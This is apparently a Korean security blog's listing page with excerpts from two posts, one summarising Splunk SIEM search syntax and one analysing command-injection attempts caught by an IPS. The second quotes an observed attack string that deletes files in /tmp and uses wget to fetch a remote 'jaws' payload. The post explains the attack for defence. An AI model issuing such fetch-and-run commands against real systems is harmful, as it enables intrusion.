IT 관련/Security2 Splunk SIEM 명령어 정리 스플렁크 로그를 수집하고 사용자가 원하는 결과를 추출하는 대용량 로그 수집/분석 시스템이다. 컴퓨터, 네트워크 장비에서 생성하는 로그 데이터에 최적화되어 있지만 텍스트 기반의 로그라면 어떤 장비로부터 로그를 수신하고 분석할 수 있다. 기본 검색 방법 단어 여러개 검색 : error cart success등 검색 가능 단어 검색 : “Mac OS” (띄어쓰기를 포함한 내용 검색) 와일드 카드 : error* 상태 검색 Boolean : state=401 OR 403 (AND, OR, NOT 등에 대하여 상태코드가 401, 403이 아닌걸 검색) 시간 검색 : earliest=07/21/2020:18:20:00 latest=07/21/2020:18:30:00 earliest=-70h.. 2022. 11. 14. Commandline Injection Attack (명령어 삽입 공격) 22. 9. 5. 밤에 쓰는 이야기 최근 IPS에서 들어오는 취약점 공격으로 Snort 룰 : GET /shell cd/tmp rm -rf wget 0.0.0.0/jaws 공격이 많이 들어오고 있다. 해당 내용 분석결과 wget 커맨드 라인에 대한 공격으로 1. 시스템 명령어를 호출하는 어플리케이션의 인자 값을 조작하여 의도하지 않은 시스템 명령어를 실행시키는 공격 기법 2. 취약한 어플리케이션을 통하여 사용자의 명령어 시스템에서 임의적인 명령을 실행시키는 것을 목적으로 하는 공격 으로 설명이 될 수 있다. tmp 파일은 임시 파일로 현재 위에 공격방법은 tmp 디렉토리에 접근하여 악성 스크립트를 삽입하려는 시도로 매우 강하게 보인다. wget은 리눅스에서 파일을 다운받는 명령어로 wget [옵션]..... 2022. 9. 5. 이전 1 다음